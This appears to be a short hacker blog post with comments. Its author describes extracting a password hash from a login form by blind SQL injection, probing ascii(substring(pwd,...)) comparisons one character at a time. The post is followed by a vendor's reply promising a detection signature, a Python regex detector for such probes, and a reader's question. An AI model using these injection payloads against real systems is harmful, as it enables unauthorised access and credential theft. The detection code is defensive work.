
YYEEEESSSS! I'll do it! (2 hours)

in

name: admin
password: blabla') OR ascii(substring(pwd,1,1))>('50 - (+)
password: blabla') OR ascii(substring(pwd,1,1))<('52 - (+)
password: blabla') OR ascii(substring(pwd,1,1))=('52 -(-)
password: blabla') OR ascii(substring(pwd,1,1))=('51 - 2 (+)
first symbol: 2
blabla') OR ascii(substring(pwd,2,1)).. second symbol ....
etc..
in the end: 37fa265330ad83eaa879efb1e2db6380896cf639
SHA('pwd')=37fa265330ad83eaa879efb1e2db6380896cf639 it's TRUE!!!

YEEEEESSSS!
icq: 354 - 345 - 367

Comments

Hi eLWAux

Thank you for your email!!!

I will add custom signature for substring() function as a one that can be used to brute force database contents. The fix will be available in the next application release.

Thanks again,
Yuli
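
The kind of signature described in the reply above, sketched as an added example (not code from this thread or from the product): it flags login-field values that wrap substring() in ascii() and compare the result, then counts such probes per source. The function names, the threshold and the sample addresses are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Character-extraction functions seen in boolean-based blind SQL injection.
EXTRACT = r"(?:substring|substr|mid)"
CODEPOINT = r"(?:ascii|ord)"

# ascii(substring(<col>, <pos>, <len>)) followed by a comparison operator.
PROBE = re.compile(
    rf"{CODEPOINT}\s*\(\s*{EXTRACT}\s*\(\s*(?P<col>[\w.`]+)\s*,\s*(?P<pos>\d+)"
    rf"\s*,\s*\d+\s*\)\s*\)\s*(?P<op>[<>=]+)",
    re.IGNORECASE,
)

def match_probe(value):
    """Return (column, position, operator) if the input holds a probe, else None."""
    m = PROBE.search(value)
    return (m["col"].lower(), int(m["pos"]), m["op"]) if m else None

def score_sources(events, threshold=3):
    """events: iterable of (source, field_value) pairs.
    Returns a summary for each source whose probe count reaches the threshold."""
    hits = defaultdict(list)
    for source, value in events:
        probe = match_probe(value)
        if probe:
            hits[source].append(probe)
    return {
        src: {"probes": len(p),
              "columns": sorted({col for col, _, _ in p}),
              "positions": sorted({pos for _, pos, _ in p})}
        for src, p in hits.items() if len(p) >= threshold
    }

# Constructed sample: password-field values as a login handler might log them.
SAMPLE = [
    ("198.51.100.7", "blabla') OR ascii(substring(pwd,1,1))>('50"),
    ("198.51.100.7", "blabla') OR ascii(substring(pwd,1,1))<('52"),
    ("198.51.100.7", "blabla') OR ASCII( SUBSTRING(pwd, 2, 1) )=('51"),
    ("203.0.113.9", "correct horse battery staple"),
    ("203.0.113.9", "my substring(of) text"),
]

if __name__ == "__main__":
    for src, summary in score_sources(SAMPLE).items():
        print(src, summary)
```

A pattern like this only matches one spelling of the probe; parameterised queries in the login handler remove the injection point itself.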

I registered just to ask: ascii(substring(pwd,1,1))=('51 - 2 (+)

I can't find anything on what's after the '=', what's the function and what is the plus sign doing?
